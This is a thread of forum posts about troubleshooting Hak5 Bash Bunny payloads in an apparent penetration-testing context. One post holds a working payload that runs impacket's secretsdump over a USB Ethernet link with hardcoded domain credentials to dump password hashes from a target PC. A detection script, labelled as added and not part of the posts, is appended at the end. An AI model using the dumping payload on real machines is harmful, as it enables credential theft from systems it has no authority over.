Posts posted by Altecheon
-
-
1 minute ago, mrpmcfc said:
I can ping the machine from the bunny but if I run your script the TestOutput is empty
If the script returns blank, make sure that the GET function is in the extension folder of the library folder.
If it isn't there, then make sure to put the newest repository on the bunny. It should have the extension
-
Can you guys successfully connect to the BB through ssh with the IP 172.16.64.1? If so, see if you can ping the IP given to the machine; usually mine is 172.16.64.10. It should show via ifconfig or ipconfig in the respective operating systems if the system is receiving an IP. An example payload of these in action is as follows.
Quote
# System default payload
LED R SLOW
ATTACKMODE RNDIS_ETHERNET
# GET comes from the extension folder and fills in the TARGET_* variables
GET TARGET_HOSTNAME
GET TARGET_IP
cd /
if [ ! -d "temp" ]; then
    mkdir temp
fi
echo $TARGET_IP $TARGET_HOSTNAME > /temp/TestOutput

This should create a file at /temp/ named TestOutput. To access it, log into the bunny and look for it:

Quote
cat /temp/TestOutput
I don't have my bunny at the moment to test the code, but you should be able to see what the payloads see. If you cannot access the bunny, make sure that your computer can correctly see the bunny (e.g. drivers found).
-
It is a custom payload using impacket at the old firmware location. It assumes that you know the domain/user and password to pull credentials from a PC. If the account is cached, it executes, but if not it fails due to contacting the login server. I have also figured out that the use of an @ or a colon in a password causes issues for the impacket code.
Quote
USER=domain/Genericuser
PASS=GenericPassword
LED R SLOW
ATTACKMODE RNDIS_ETHERNET
GET TARGET_HOSTNAME
GET TARGET_IP
# if target does not get an IP give fail LED
if [ -z "${TARGET_IP}" ]; then
    LED R 100
    exit 1
fi
cd /pentest/impacket/examples
if [ ! -d "temp" ]; then
    mkdir temp
fi
python secretsdump.py $USER:$PASS@$TARGET_IP -outputfile temp/$TARGET_HOSTNAME > temp/$TARGET_HOSTNAME.outputfile
sync
LED G SLOW
-
I understand that part of the plan for the BB was Man in the Middle attacks, which is why I am running into an issue with one of the payloads I am playing around with. In an enterprise environment the system, unless it's a laptop, may not cache credentials that you may have obtained. This being said, if the user is not currently logged into the machine or has not logged in for a while, the system will attempt to reach out to a login server. If the BB is the route the system takes to reach the internet, then the computer will throw an error like this:
Quote
"SMB SessionError: STATUS_NO_LOGON_SERVERS(No logon servers are currently available to service the logon request.)"
All of that being said, I think a feature that may be helpful would be to allow for configuration of the Ethernet modes. This would allow you to set the connection to slower than most networks or maybe have no connection to the internet. This would also help when you do not wish to interrupt internet connectivity for the device.
I cannot say that you cannot configure this already, but I can say I do not know how to configure this and that I am curious as to how I would do this.
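A defender-side view of the behaviour described above, as an added example that is not part of the original posts: it scans exported Windows Security events (4624/4625, network logon type 3) for sources in the 172.16.64.x range the posts mention and labels failures carrying status 0xC000005E (STATUS_NO_LOGON_SERVERS). The JSON-lines export format, the host names and the /24 mask are assumptions, and the events are constructed.

```python
import ipaddress
import json

# Assumption: the USB-Ethernet link uses 172.16.64.0/24, inferred from the
# 172.16.64.1 / 172.16.64.10 addresses quoted in the posts.
BUNNY_NET = ipaddress.ip_network("172.16.64.0/24")
NO_LOGON_SERVERS = 0xC000005E  # NTSTATUS STATUS_NO_LOGON_SERVERS

# Constructed sample: Security-log events as JSON lines (hypothetical export format).
SAMPLE_EVENTS = """\
{"EventID": 4625, "LogonType": 3, "IpAddress": "172.16.64.1", "TargetUserName": "Genericuser", "Status": "0xC000005E", "Computer": "WS-042"}
{"EventID": 4624, "LogonType": 3, "IpAddress": "172.16.64.1", "TargetUserName": "Genericuser", "Status": "0x0", "Computer": "WS-017"}
{"EventID": 4625, "LogonType": 3, "IpAddress": "10.20.1.7", "TargetUserName": "alice", "Status": "0xC000006D", "Computer": "WS-042"}
{"EventID": 4624, "LogonType": 2, "IpAddress": "-", "TargetUserName": "bob", "Status": "0x0", "Computer": "WS-042"}
{"EventID": 4625, "LogonType": 3, "IpAddress": "::ffff:172.16.64.1", "TargetUserName": "svc", "Status": "0xC000006D", "Computer": "WS-051"}
"""

def source_ip(raw):
    """Parse the IpAddress field; return None for '-' or other non-addresses."""
    try:
        addr = ipaddress.ip_address(raw.strip())
    except ValueError:
        return None
    # Unwrap IPv4-mapped IPv6 (::ffff:a.b.c.d) so it compares against the /24.
    return getattr(addr, "ipv4_mapped", None) or addr

def classify(event):
    """Label network logons sourced from the USB-Ethernet subnet, else None."""
    if event.get("EventID") not in (4624, 4625) or int(event.get("LogonType", 0)) != 3:
        return None
    addr = source_ip(str(event.get("IpAddress", "")))
    if addr is None or addr not in BUNNY_NET:
        return None
    if event["EventID"] == 4624:
        return "network logon succeeded from USB-Ethernet subnet"
    if int(str(event.get("Status", "0")), 16) == NO_LOGON_SERVERS:
        return "logon failed: host could not reach a logon server"
    return "network logon failed from USB-Ethernet subnet"

def scan(jsonl):
    """Return (computer, user, label) for every flagged event in the export."""
    findings = []
    for event in map(json.loads, filter(str.strip, jsonl.splitlines())):
        label = classify(event)
        if label:
            findings.append((event.get("Computer"), event.get("TargetUserName"), label))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(*finding, sep=" | ")
```

If 172.16.64.0/24 is a legitimately routed range in your environment, scope the rule to workstation logs or pair it with new-network-adapter events before alerting.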
LED Control
in Bash Bunny
Please refer to this document. It includes details on how to use the LED features:
https://wiki.bashbunny.com/#!payload_development.md